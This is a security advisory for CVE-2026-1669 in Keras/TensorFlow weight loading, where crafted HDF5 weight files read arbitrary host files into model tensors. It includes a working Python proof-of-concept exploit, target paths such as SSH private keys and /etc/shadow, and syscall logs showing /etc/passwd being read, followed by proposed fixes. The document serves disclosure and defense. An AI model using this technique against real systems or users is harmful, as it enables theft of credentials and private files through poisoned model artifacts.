CVE-2026-1669 - GitHub Advisory Database (original) (raw)

Summary

TensorFlow / Keras continues to honor HDF5 “external storage” and ExternalLink features when loading weights. A malicious .weights.h5 (or a .keras archive embedding such weights) can direct load_weights() to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras “safe mode” only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (tensorflow 2.20.0, keras 3.11.3, h5py 3.15.1, numpy 2.3.4).

Impact

Attacker Scenario

  1. Initial foothold: The attacker convinces a user (or CI automation) to consume a weight artifact—perhaps by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.
  2. Crafted payload: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g., /home/<user>/.ssh/id_rsa, /etc/shadow if readable, configuration files containing API keys, etc.).
  3. Execution: The victim calls model.load_weights() (or tf.keras.models.load_model() for .keras archives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors.
  4. Exfiltration vectors:
    • Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.
    • Re-saving the model (weights or .keras archive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry.
    • If the victim pushes the re-saved artifact to source control or a package repository, the attacker retrieves the captured data without needing continued access to the victim environment.

Additional Preconditions

Environment Used for Verification (2025‑10‑19)

Reproduction Instructions (Weights-Only PoC)

  1. Ensure the environment above (or equivalent) is prepared.
  2. Save the following script as weights_external_demo.py:

from future import annotations import os from pathlib import Path import numpy as np import tensorflow as tf import h5py

def choose_host_file() -> Path: candidates = [ os.environ.get("KFLI_PATH"), "/etc/machine-id", "/etc/hostname", "/proc/sys/kernel/hostname", "/etc/passwd", ] for candidate in candidates: if not candidate: continue path = Path(candidate) if path.exists() and path.is_file(): return path raise FileNotFoundError("set KFLI_PATH to a readable file")

def build_model(units: int) -> tf.keras.Model: model = tf.keras.Sequential([ tf.keras.layers.Input(shape=(1,), name="input"), tf.keras.layers.Dense(units, activation=None, use_bias=True, name="dense"), ]) model(tf.zeros((1, 1))) # build weights return model

def find_bias_dataset(h5file: h5py.File) -> str: matches: list[str] = [] def visit(name: str, obj) -> None: if isinstance(obj, h5py.Dataset) and name.endswith("bias:0"): matches.append(name) h5file.visititems(visit) if not matches: raise RuntimeError("bias dataset not found") return matches[0]

def rewrite_bias_external(path: Path, host_file: Path) -> tuple[int, int]: with h5py.File(path, "r+") as h5file: bias_path = find_bias_dataset(h5file) parent = h5file[str(Path(bias_path).parent)] dset_name = Path(bias_path).name del parent[dset_name] max_bytes = 128 size = host_file.stat().st_size nbytes = min(size, max_bytes) nbytes = (nbytes // 4) * 4 or 32 # multiple of 4 for float32 packing units = max(1, nbytes // 4) parent.create_dataset( dset_name, shape=(units,), dtype="float32", external=[(host_file.as_posix(), 0, nbytes)], ) return units, nbytes

def floats_to_ascii(arr: np.ndarray) -> tuple[str, str]: raw = np.ascontiguousarray(arr).view(np.uint8) ascii_preview = bytes(b if 32 <= b < 127 else 46 for b in raw).decode("ascii", "ignore") hex_preview = raw[:64].tobytes().hex() return ascii_preview, hex_preview

def main() -> None: host_file = choose_host_file() model = build_model(units=32)

weights_path = Path("weights_demo.h5")
model.save_weights(weights_path.as_posix())

units, nbytes = rewrite_bias_external(weights_path, host_file)
print("secret_text_source", host_file)
print("units", units, "bytes_mapped", nbytes)

model.load_weights(weights_path.as_posix())
output = model.predict(tf.zeros((1, 1)), verbose=0)[0]
ascii_preview, hex_preview = floats_to_ascii(output)
print("recovered_ascii", ascii_preview)
print("recovered_hex64", hex_preview)

saved = Path("weights_demo_resaved.h5")
model.save_weights(saved.as_posix())
print("resaved_weights", saved.as_posix())

if name == "main": main()

  1. Execute python weights_external_demo.py.
  2. Observe:
    • secret_text_source prints the chosen host file path.
    • recovered_ascii/recovered_hex64 display the file contents recovered via model inference.
    • A re-saved weights file contains the leaked bytes inside the artifact.

Expanded Validation (Multiple Attack Scenarios)

The following test harness generalises the attack for multiple HDF5 constructs:

Relevant syscall excerpts captured during the run:

openat(AT_FDCWD, "/etc/hosts", O_RDONLY|O_CLOEXEC) = 7
read(7, "127.0.0.1 localhost\n", 64) = 21
...
openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 9
read(9, "root:x:0:0:root:/root:/bin/bash\n", 64) = 32
...
openat(AT_FDCWD, "/etc/hostname", O_RDONLY|O_CLOEXEC) = 8
read(8, "example-host\n", 64) = 13

The corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.

  1. Default-deny external datasets/links:
    • Inspect creation property lists (get_external_count) before materialising tensors.
    • Resolve SoftLink / ExternalLink targets and block if they leave the HDF5 file.
  2. Provide an escape hatch:
    • Offer an explicit allow_external_data=True flag or environment variable for advanced users who truly rely on HDF5 external storage.
  3. Documentation:
    • Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.
  4. Regression coverage:
    • Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.

Workarounds

Timeline (UTC)

References